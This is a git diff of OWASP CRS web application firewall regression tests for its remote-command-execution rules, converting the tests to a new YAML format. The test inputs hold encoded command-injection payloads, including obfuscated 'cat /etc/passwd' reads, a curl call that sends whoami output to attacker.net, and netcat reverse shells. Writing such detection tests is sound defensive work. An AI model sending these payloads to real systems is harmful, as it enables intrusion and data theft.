"OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%40at%2B%2Fet%24%40c%2Fpas%24%40swd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 5 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%21at%2B%2Fet%24%21c%2Fpas%24%21swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%21at%2B%2Fet%24%21c%2Fpas%24%21swd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 6 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%2Aat%2B%2Fet%24%2Ac%2Fpas%24%2Aswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%2Aat%2B%2Fet%24%2Ac%2Fpas%24%2Aswd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 7 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%3Fat%2B%2Fet%24%3Fc%2Fpas%24%3Fswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%3Fat%2B%2Fet%24%3Fc%2Fpas%24%3Fswd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 8 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24-at%2B%2Fet%24-c%2Fpas%24-swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24-at%2B%2Fet%24-c%2Fpas%24-swd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 9 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24_at%2B%2Fet%24_c%2Fpas%24_swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24_at%2B%2Fet%24_c%2Fpas%24_swd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 10 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%24at%2B%2Fet%24%24c%2Fpas%24%24swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%24at%2B%2Fet%24%24c%2Fpas%24%24swd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 11 desc: "Test first backslash match ([*?`\\'][^/\n]+/) with: c\at /etc/passwd" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%5Cat%20%2Fetc%2Fpasswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%5Cat%20%2Fetc%2Fpasswd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 12 desc: "Test second backslash match (/[^/]+?[*?`\\']) with: cat /etc/p\asswd" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;cat%20%2Fetc%2Fp%5Casswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;cat%20%2Fetc%2Fp%5Casswd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 13 desc: "Test correct logging" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" - version: HTTP/1.0 - output: - no_log_contains: found within MATCHED_VAR - - test_title: 932200-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" + version: HTTP/1.0 + output: + no_log_contains: found within MATCHED_VAR + - test_id: 14 desc: "Test variable assignment ('cat /etc/passwd' assigned via individual variables, cat in reverse order)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - data: exec=c4%3D%5C%20%3Bc3%3Dt%3Bc2%3Da%3Bc1%3Dc%3Ba1%3D%2F%3Ba2%3De%3Ba3%3Dt%3Ba4%3Dc%3Ba5%3D%2F%3Ba6%3Dp%3Ba7%3Da%3Ba8%3Ds%3Ba9%3Ds%3Ba10%3Dw%3Ba11%3Dd%3B%24c1%24c2%24c3%24c4%24a1%24a2%24a3%24a4%24a5%24a6%24a7%24a8%24a9%24a10%24a11%0A - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-15 + - input: + dest_addr: 127.0.0.1 + data: exec=c4%3D%5C%20%3Bc3%3Dt%3Bc2%3Da%3Bc1%3Dc%3Ba1%3D%2F%3Ba2%3De%3Ba3%3Dt%3Ba4%3Dc%3Ba5%3D%2F%3Ba6%3Dp%3Ba7%3Da%3Ba8%3Ds%3Ba9%3Ds%3Ba10%3Dw%3Ba11%3Dd%3B%24c1%24c2%24c3%24c4%24a1%24a2%24a3%24a4%24a5%24a6%24a7%24a8%24a9%24a10%24a11%0A + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 15 desc: "Add test to match BB EBIDJ91T" stages: - - stage: - input: - dest_addr: 127.0.0.1 - data: cmd%3Da%3Dcurl%26%26b%3D%60whoami%60%26%26%24a%20attacker.net%2F%24b - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-16 + - input: + dest_addr: 127.0.0.1 + data: cmd%3Da%3Dcurl%26%26b%3D%60whoami%60%26%26%24a%20attacker.net%2F%24b + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 16 desc: "Add test to match BB MKXQCJMX" stages: - - stage: - input: - dest_addr: 127.0.0.1 - data: cmd=a%3D%2Fetc%26%26b%3D%2Fpasswd%26%26c%3Dcat%26%26%24c%20%24a%24b - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "932200" + - input: + dest_addr: 127.0.0.1 + data: cmd=a%3D%2Fetc%26%26b%3D%2Fpasswd%26%26c%3Dcat%26%26%24c%20%24a%24b + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log_contains: id "932200" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml index e79b47c6e..4873cd347 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml @@ -2,125 +2,117 @@ meta: author: "Max Leske, azurit" description: RCE Bypass - enabled: true - name: 932205.yaml +rule_id: 932205 tests: - - test_title: 932205-1 + - test_id: 1 desc: Referer without query string, trying to evade query string match stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "www.google.com;c$?at+/etc/passwd" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932205" - - test_title: 932205-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "www.google.com;c$?at+/etc/passwd" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "932205" + - test_id: 2 desc: Referer header with query string and obvious payload stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "www.google.com?param=;/bin/ca?+/et*/passwd" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932205" - - test_title: 932205-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "www.google.com?param=;/bin/ca?+/et*/passwd" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "932205" + - test_id: 3 desc: Referer header with canonical path, query string and obvious payload stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "www.google.com/?param=;/bin/ca?+/et*/passwd" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932205" - - test_title: 932205-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "www.google.com/?param=;/bin/ca?+/et*/passwd" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "932205" + - test_id: 4 desc: False positive test against query string and space in a parameter stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "http://www.example.com/page?param=test+test" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932205" - - test_title: 932205-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "http://www.example.com/page?param=test+test" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932205" + - test_id: 5 desc: False positive test against query string and space in path stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "http://www.example.com/page%20test?param=test" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932205" - - test_title: 932205-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "http://www.example.com/page%20test?param=test" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932205" + - test_id: 6 desc: False positive test against syntax highlighter (generic) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "https://coreruleset.org/#:~:text=generic%20attack%20detection" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932205" - - test_title: 932205-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "https://coreruleset.org/#:~:text=generic%20attack%20detection" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932205" + - test_id: 7 desc: False positive test against fragment (scroll to text fragment) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "https://www.google.com/url?q=https://example.com/path/#:~:text=Inoltre%2C%20non%20vi%20sono%20evidenze,'immaginario%20comune%20(1).&sa=U&ved=2ahUKEwjSluGs8eX9AhWiSvEDHaaEChEQFnoECAgQBQ&usg=AOvVaw1_nmpM50Zh9-mGx1DsMw7j" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932205" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "https://www.google.com/url?q=https://example.com/path/#:~:text=Inoltre%2C%20non%20vi%20sono%20evidenze,'immaginario%20comune%20(1).&sa=U&ved=2ahUKEwjSluGs8eX9AhWiSvEDHaaEChEQFnoECAgQBQ&usg=AOvVaw1_nmpM50Zh9-mGx1DsMw7j" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932205" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml index d795b05f2..dfbd11e85 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml @@ -2,57 +2,53 @@ meta: author: "Max Leske, azurit" description: RCE Bypass - enabled: true - name: 932206.yaml +rule_id: 932206 tests: - - test_title: 932206-1 + - test_id: 1 desc: Referer header without URL stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "/bin/ca't'+/et*/passwd" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932206" - - test_title: 932206-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "/bin/ca't'+/et*/passwd" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "932206" + - test_id: 2 desc: False positive test against URL stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "http://www.example.com/page?param=test+test" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932206" - - test_title: 932206-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "http://www.example.com/page?param=test+test" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932206" + - test_id: 3 desc: False positive test against query string and space in path stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "http://www.example.com/page%20test?param=test" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932206" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "http://www.example.com/page%20test?param=test" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932206" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml index 386492d8b..568668e67 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml @@ -2,122 +2,114 @@ meta: author: "flo405, Franziska Bühler, azurit" description: SQLite System Command Execution - enabled: true - name: 932210.yaml +rule_id: 932210 tests: - - test_title: 932210-1 + - test_id: 1 desc: ";\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\n" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=;\\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=;\\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" + version: HTTP/1.0 + output: + log_contains: id "932210" + - test_id: 2 desc: "%22;\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\n" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%22;\\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%22;\\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" + version: HTTP/1.0 + output: + log_contains: id "932210" + - test_id: 3 desc: ";\n.system%20nc%2010.10.10.1%206666%20-e%20sh\n" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=;\\n.system%20nc%2010.10.10.1%206666%20-e%20sh\\n" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=;\\n.system%20nc%2010.10.10.1%206666%20-e%20sh\\n" + version: HTTP/1.0 + output: + log_contains: id "932210" + - test_id: 4 desc: ";\n.databases" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=;\\n.databases" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=;\\n.databases" + version: HTTP/1.0 + output: + log_contains: id "932210" + - test_id: 5 desc: "Fix N9FKP2XQ: .sh whoami" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/juiceshop?s=1;.sh+whoami" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/juiceshop?s=1;.sh+whoami" + version: HTTP/1.0 + output: + log_contains: id "932210" + - test_id: 6 desc: "N9FKP2XQ" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - code=1;.\"shell whoami - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932210" - - test_title: 932210-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + code=1;.\"shell whoami + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "932210" + - test_id: 7 desc: "N9FKP2XQ" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - code=1;.\'shell whoami - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932210" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + code=1;.\'shell whoami + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "932210" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml index c0a81d84e..22fea813a 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml @@ -2,255 +2,240 @@ meta: author: "Max Leske, Xhoenix, azurit" description: Unix shell RCE using pipe for less than 4 chars - enabled: true - name: 932220.yaml +rule_id: 932220 tests: - - test_title: 932220-1 + - test_id: 1 desc: "TEST=echo | php7.4" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "TEST=echo | php7.4" - version: HTTP/1.0 - output: - log_contains: id "932220" - - test_title: 932220-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "TEST=echo | php7.4" + version: HTTP/1.0 + output: + log_contains: id "932220" + - test_id: 2 desc: "TEST=echo | ${php7.4}php7.4" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "TEST=echo | ${php7.4}php7.4" - version: HTTP/1.0 - output: - log_contains: id "932220" - - test_title: 932220-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "TEST=echo | ${php7.4}php7.4" + version: HTTP/1.0 + output: + log_contains: id "932220" + - test_id: 3 desc: "whxami|sh+``" stages: - - stage: - input: - dest_addr: 127.0.0.1 - 